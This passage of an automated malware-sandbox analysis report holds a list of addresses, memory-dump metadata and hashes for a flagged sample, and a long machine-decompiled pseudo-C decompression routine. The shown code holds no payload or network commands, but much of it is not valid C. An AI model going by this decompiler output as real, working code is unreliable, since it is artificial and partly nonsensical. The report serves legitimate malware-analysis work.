                                                                                    0x00000000
                                                                                    0x0040749d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004071c2
                                                                                    0x004071c2
                                                                                    0x004071c5
                                                                                    0x004071fb
                                                                                    0x004071fb
                                                                                    0x0040732b
                                                                                    0x0040732b
                                                                                    0x0040732b
                                                                                    0x0040732b
                                                                                    0x0040732e
                                                                                    0x0040732e
                                                                                    0x00407331
                                                                                    0x00407333
                                                                                    0x004075bd
                                                                                    0x004075bd
                                                                                    0x00000000
                                                                                    0x004075bd
                                                                                    0x00407339
                                                                                    0x00407339
                                                                                    0x0040733c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407342
                                                                                    0x00407342
                                                                                    0x00407346
                                                                                    0x00407349
                                                                                    0x00407349
                                                                                    0x00407349
                                                                                    0x00000000
                                                                                    0x00407349
                                                                                    0x004071c7
                                                                                    0x004071c7
                                                                                    0x004071c9
                                                                                    0x004071cb
                                                                                    0x004071cd
                                                                                    0x004071d0
                                                                                    0x004071d1
                                                                                    0x004071d3
                                                                                    0x004071d5
                                                                                    0x004071d8
                                                                                    0x004071db
                                                                                    0x004071f1
                                                                                    0x004071f1
                                                                                    0x004071f6
                                                                                    0x0040722e
                                                                                    0x0040722e
                                                                                    0x00407232
                                                                                    0x0040725b
                                                                                    0x0040725e
                                                                                    0x00407260
                                                                                    0x00407267
                                                                                    0x0040726a
                                                                                    0x0040726d
                                                                                    0x0040726d
                                                                                    0x00407272
                                                                                    0x00407272
                                                                                    0x00407274
                                                                                    0x00407277
                                                                                    0x0040727e
                                                                                    0x00407281
                                                                                    0x004072ae
                                                                                    0x004072ae
                                                                                    0x004072b1
                                                                                    0x004072b4
                                                                                    0x00407328
                                                                                    0x00407328
                                                                                    0x00407328
                                                                                    0x00407328
                                                                                    0x00000000
                                                                                    0x00407328
                                                                                    0x004072b6
                                                                                    0x004072b6
                                                                                    0x004072bc
                                                                                    0x004072bf
                                                                                    0x004072c2
                                                                                    0x004072c5
                                                                                    0x004072c8
                                                                                    0x004072cb
                                                                                    0x004072ce
                                                                                    0x004072d1
                                                                                    0x004072d4
                                                                                    0x004072d7
                                                                                    0x004072f0
                                                                                    0x004072f2
                                                                                    0x004072f5
                                                                                    0x004072f6
                                                                                    0x004072f9
                                                                                    0x004072fb
                                                                                    0x004072fe
                                                                                    0x00407300
                                                                                    0x00407302
                                                                                    0x00407305
                                                                                    0x00407307
                                                                                    0x0040730a
                                                                                    0x0040730e
                                                                                    0x00407310
                                                                                    0x00407310
                                                                                    0x00407311
                                                                                    0x00407314
                                                                                    0x00407317
                                                                                    0x004072d9
                                                                                    0x004072d9
                                                                                    0x004072e1
                                                                                    0x004072e6
                                                                                    0x004072e8
                                                                                    0x004072eb
                                                                                    0x004072eb
                                                                                    0x0040731a
                                                                                    0x00407321
                                                                                    0x004072ab
                                                                                    0x004072ab
                                                                                    0x004072ab
                                                                                    0x004072ab
                                                                                    0x00000000
                                                                                    0x00407323
                                                                                    0x00407323
                                                                                    0x00000000
                                                                                    0x00407323
                                                                                    0x00407321
                                                                                    0x00407234
                                                                                    0x00407234
                                                                                    0x00407237
                                                                                    0x00407239
                                                                                    0x0040723c
                                                                                    0x0040723f
                                                                                    0x00407242
                                                                                    0x00407244
                                                                                    0x00407247
                                                                                    0x0040724a
                                                                                    0x0040724a
                                                                                    0x0040724d
                                                                                    0x0040724d
                                                                                    0x00407250
                                                                                    0x00407257
                                                                                    0x0040722b
                                                                                    0x0040722b
                                                                                    0x0040722b
                                                                                    0x0040722b
                                                                                    0x00000000
                                                                                    0x00407259
                                                                                    0x00407259
                                                                                    0x00000000
                                                                                    0x00407259
                                                                                    0x00407257
                                                                                    0x004071dd
                                                                                    0x004071dd
                                                                                    0x004071e0
                                                                                    0x004071e2
                                                                                    0x004071e5
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406f44
                                                                                    0x00406f44
                                                                                    0x00406f48
                                                                                    0x0040758d
                                                                                    0x0040758d
                                                                                    0x00000000
                                                                                    0x0040758d
                                                                                    0x00406f4e
                                                                                    0x00406f4e
                                                                                    0x00406f51
                                                                                    0x00406f54
                                                                                    0x00406f57
                                                                                    0x00406f5a
                                                                                    0x00406f5d
                                                                                    0x00406f60
                                                                                    0x00406f62
                                                                                    0x00406f65
                                                                                    0x00406f68
                                                                                    0x00406f6b
                                                                                    0x00406f6d
                                                                                    0x00406f6d
                                                                                    0x00406f6d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004070cf
                                                                                    0x004070cf
                                                                                    0x004070d3
                                                                                    0x00407599
                                                                                    0x00407599
                                                                                    0x00000000
                                                                                    0x00407599
                                                                                    0x004070d9
                                                                                    0x004070d9
                                                                                    0x004070dc
                                                                                    0x004070df
                                                                                    0x004070e2
                                                                                    0x004070e4
                                                                                    0x004070e4
                                                                                    0x004070e4
                                                                                    0x004070e7
                                                                                    0x004070ea
                                                                                    0x004070ed
                                                                                    0x004070f0
                                                                                    0x004070f3
                                                                                    0x004070f6
                                                                                    0x004070f7
                                                                                    0x004070f9
                                                                                    0x004070f9
                                                                                    0x004070f9
                                                                                    0x004070fc
                                                                                    0x004070ff
                                                                                    0x00407102
                                                                                    0x00407105
                                                                                    0x00407105
                                                                                    0x00407105
                                                                                    0x00407108
                                                                                    0x0040710a
                                                                                    0x0040710a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040734c
                                                                                    0x0040734c
                                                                                    0x0040734c
                                                                                    0x00407350
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407356
                                                                                    0x00407356
                                                                                    0x00407359
                                                                                    0x0040735c
                                                                                    0x0040735f
                                                                                    0x00407361
                                                                                    0x00407361
                                                                                    0x00407361
                                                                                    0x00407364
                                                                                    0x00407367
                                                                                    0x0040736a
                                                                                    0x0040736d
                                                                                    0x00407370
                                                                                    0x00407373
                                                                                    0x00407374
                                                                                    0x00407376
                                                                                    0x00407376
                                                                                    0x00407376
                                                                                    0x00407379
                                                                                    0x0040737c
                                                                                    0x0040737f
                                                                                    0x00407382
                                                                                    0x00407385
                                                                                    0x00407389
                                                                                    0x0040738b
                                                                                    0x0040738e
                                                                                    0x00000000
                                                                                    0x00407390
                                                                                    0x00407390
                                                                                    0x0040710d
                                                                                    0x0040710d
                                                                                    0x00000000
                                                                                    0x0040710d
                                                                                    0x0040738e
                                                                                    0x004075c3
                                                                                    0x004075c3
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406bf2
                                                                                    0x004075fa
                                                                                    0x004075fa
                                                                                    0x00000000
                                                                                    0x004075fa
                                                                                    0x00407447
                                                                                    0x004074c7
                                                                                    0x00407490

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                                                    • Instruction ID: 10cc2cc0f2c892254e5285b7a8bac4c216a70fda8fb68dfa7c3680dd08f727d3
                                                                                    • Opcode Fuzzy Hash: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                                                    • Instruction Fuzzy Hash: 55A15571E04228DBDF28CFA8C8547ADBBB1FF44305F10842AD856BB281D778A986DF45
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00407395 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 98%
                                                                                    			E00407395() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
